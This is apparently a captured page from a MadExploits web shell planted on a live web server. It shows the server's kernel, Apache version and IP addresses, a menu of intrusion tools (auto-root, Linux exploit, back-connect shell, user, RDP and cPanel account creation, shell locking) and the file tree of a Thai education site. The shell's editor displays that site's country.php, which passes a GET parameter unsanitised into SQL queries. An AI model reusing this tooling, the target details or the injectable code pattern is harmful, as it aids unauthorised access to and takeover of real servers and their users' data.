Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.226.251.94
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
myeducation.co.th /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
UserFiles
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
8.88
KB
-rw-r--r--
2HeadMenu.php
2.27
KB
-rw-r--r--
2banner.php
105
B
-rw-r--r--
2banner_mo.php
9.16
KB
-rw-r--r--
2banner_pc.php
3.81
KB
-rw-r--r--
3Footer.php
227
B
-rw-r--r--
4End.php
1.39
KB
-rw-r--r--
about.php
3.46
KB
-rw-r--r--
banner_next_country.php
3.1
KB
-rw-r--r--
banner_next_student_reviews.ph...
3.13
KB
-rw-r--r--
call_contact_mo.php
16.06
KB
-rw-r--r--
call_contact_pc.php
4.2
KB
-rw-r--r--
city.php
7.28
KB
-rw-r--r--
contact.php
5.92
KB
-rw-r--r--
country.php
5.72
KB
-rw-r--r--
detail.php
284
B
-rw-r--r--
detail_gallery.php
4.28
KB
-rw-r--r--
detail_mo.php
39.4
KB
-rw-r--r--
detail_promotion.php
3.01
KB
-rw-r--r--
detail_student_reviews.php
2.89
KB
-rw-r--r--
detail_tip.php
3.56
KB
-rw-r--r--
footer_mo.php
6.66
KB
-rw-r--r--
footer_pc.php
6.79
KB
-rw-r--r--
gallery.php
7.37
KB
-rw-r--r--
head_footer_3.php
3.59
KB
-rw-r--r--
hotpromotion.php
6.83
KB
-rw-r--r--
index.php
171
B
-rw-r--r--
index_country.php
121
B
-rw-r--r--
index_country_mo.php
4.38
KB
-rw-r--r--
index_country_pc.php
4
KB
-rw-r--r--
index_gallery.php
9.77
KB
-rw-r--r--
index_hot_promotion.php
9.2
KB
-rw-r--r--
index_student_reviews.php
9.87
KB
-rw-r--r--
index_video.php
4.54
KB
-rw-r--r--
shool.php
4.71
KB
-rw-r--r--
student_reviews.php
6.77
KB
-rw-r--r--
tip.php
7.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : country.php
<?PHP include '1Head.php'; include '2HeadMenu.php'; include '2banner.php'; ?> <style> .post { overflow: hidden; height: 435px; display: -webkit-box; -webkit-line-clamp: 3; -webkit-box-orient: vertical; } </style> <?PHP if (empty($_GET['c1'])) { $category = ""; } else { $category = trim($_GET['c1']); } if ($category == 0) { $Chk_SQL = ""; } else { $Chk_SQL = "AND product_category.ProductCategory_ID = $category"; } $SQL_Category = " SELECT product_category.ProductCategory_ID, product_category.ProductCategory_Name, product_category.StatusProductCategory_ID, status_productcategory.StatusProductCategory_Name,product_category.ProductCategory_img , product_category.ProductCategory_Detail FROM status_productcategory INNER JOIN product_category ON status_productcategory.StatusProductCategory_ID = product_category.StatusProductCategory_ID WHERE product_category.StatusProductCategory_ID = 1 $Chk_SQL ORDER BY product_category.ProductCategory_ID "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_category = mysqli_fetch_array($objQuery_Category)) { $ProductCategoryID = $objResult_category["ProductCategory_ID"]; $ProductCategoryName = $objResult_category["ProductCategory_Name"]; $ProductCategoryDetail = $objResult_category["ProductCategory_Detail"]; $ProductCategoryIMG = $objResult_category["ProductCategory_img"]; ?> <section style="background: #ebebeb;"> <div class="container" style="padding-top: 0px;padding-bottom: 120px; padding: 40px;"> <!-- Section Content --> <div class="section-content"> <div class="row"> <div class="col-md-12"> <h2 class="title text-white" style="color: #0b1592!important;font-size: 33px;font-weight: 600;"><?= $ProductCategoryName; ?></h2> <hr style="border-bottom: 4px solid #FF9800;"> <div class="text_res"> <?= $ProductCategoryDetail; ?> </div> </div> </div> </div> </div> </section> <section id="blog" class="bg-lighter" style="background-color: #fff !important;padding: 50px;"> <div class="container" style="background: #fff;padding: 40px;"> <div class="section-content"> <div class="row"> <?PHP $SQL_Category2 = " SELECT product_category.ProductCategory_ID, product_category.ProductCategory_Name, product_category.StatusProductCategory_ID, product_category2.ProductCategory2_ID, product_category2.StatusProductCategory2_ID,product_category2.ProductCategory2_IMG, product_category2.ProductCategory2_ahref_name , product_category2.ProductCategory2_ahref_status, product_category2.ProductCategory2_Name ,product_category2.ProductCategory2_Detail FROM product_category2 INNER JOIN product_category ON product_category2.ProductCategory_ID = product_category.ProductCategory_ID WHERE product_category2.StatusProductCategory2_ID = 1 AND product_category.ProductCategory_ID = $ProductCategoryID ORDER BY product_category.ProductCategory_ID "; $objQuery_Category2 = $objConnect->query($SQL_Category2); while ($objResult_category2 = mysqli_fetch_array($objQuery_Category2)) { $ProductCategoryID = $objResult_category2["ProductCategory_ID"]; $ProductCategoryID2 = $objResult_category2["ProductCategory2_ID"]; $ProductCategoryName2 = $objResult_category2["ProductCategory2_Name"]; $ProductCategory2Detail = $objResult_category2["ProductCategory2_Detail"]; $ProductCategory2_ahref_name = $objResult_category2["ProductCategory2_ahref_name"]; $ProductCategory2_ahref_status = $objResult_category2["ProductCategory2_ahref_status"]; $ProductCategory2IMG = $objResult_category2["ProductCategory2_IMG"]; if ($ProductCategory2_ahref_status == 2) { $chk_ahref_status = $ProductCategory2_ahref_name; } else { $chk_ahref_status = "city.php?c1=" . $ProductCategoryID . "&c2=" . $ProductCategoryID2; } ?> <div class="col-xs-12 col-sm-6 col-md-4" style="padding: 10px;"> <article class="post clearfix mb-sm-30" style="-webkit-box-shadow: 0px 0px 5px 0px #a7a7a7bf;-moz-box-shadow: 0px 0px 11px 0px rgba(0,0,0,0.75);padding: 5px"> <div class="entry-header"> <div class="post-thumb thumb"> <a href="<?= $chk_ahref_status; ?>"><img src="model/upload/img/IMG_Category/<?= $ProductCategory2IMG; ?>" alt="" class="img-responsive img-fullwidth"></a> </div> </div> <div class="entry-content p-20 pr-10 bg-white"> <div class="entry-meta media mt-0 no-bg no-border"> <div class="media-body pl-15"> <div class="event-content pull-left flip"> <h4 class="entry-title text-white text-uppercase m-0 mt-5" style="font-weight: 600;font-size: 20px;"><a href="<?= $chk_ahref_status; ?>"><?= $ProductCategoryName2; ?></a></h4> <br> </div> </div> </div> <div class="text_res2"> <?= $ProductCategory2Detail; ?> </div> <div class="clearfix"></div> </div> </article> </div> <?PHP } ?> </div> </div> </div> </section> <?PHP } ?> <?PHP include '3Footer.php'; include '4End.php'; ?>
Close